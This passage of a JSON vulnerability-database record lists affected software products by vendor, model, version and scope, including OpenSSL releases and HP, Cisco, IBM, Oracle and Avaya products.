"ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "app for stream", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise communications broker pcz2.0.0m4p5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.1.3" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "cognos controller if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.3" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.63" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise session border controller ecz7.3m2p2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "project openssl 0.9.8zd", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos controller interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "mint", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "integrated lights out manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.3" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "tuxedo", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", 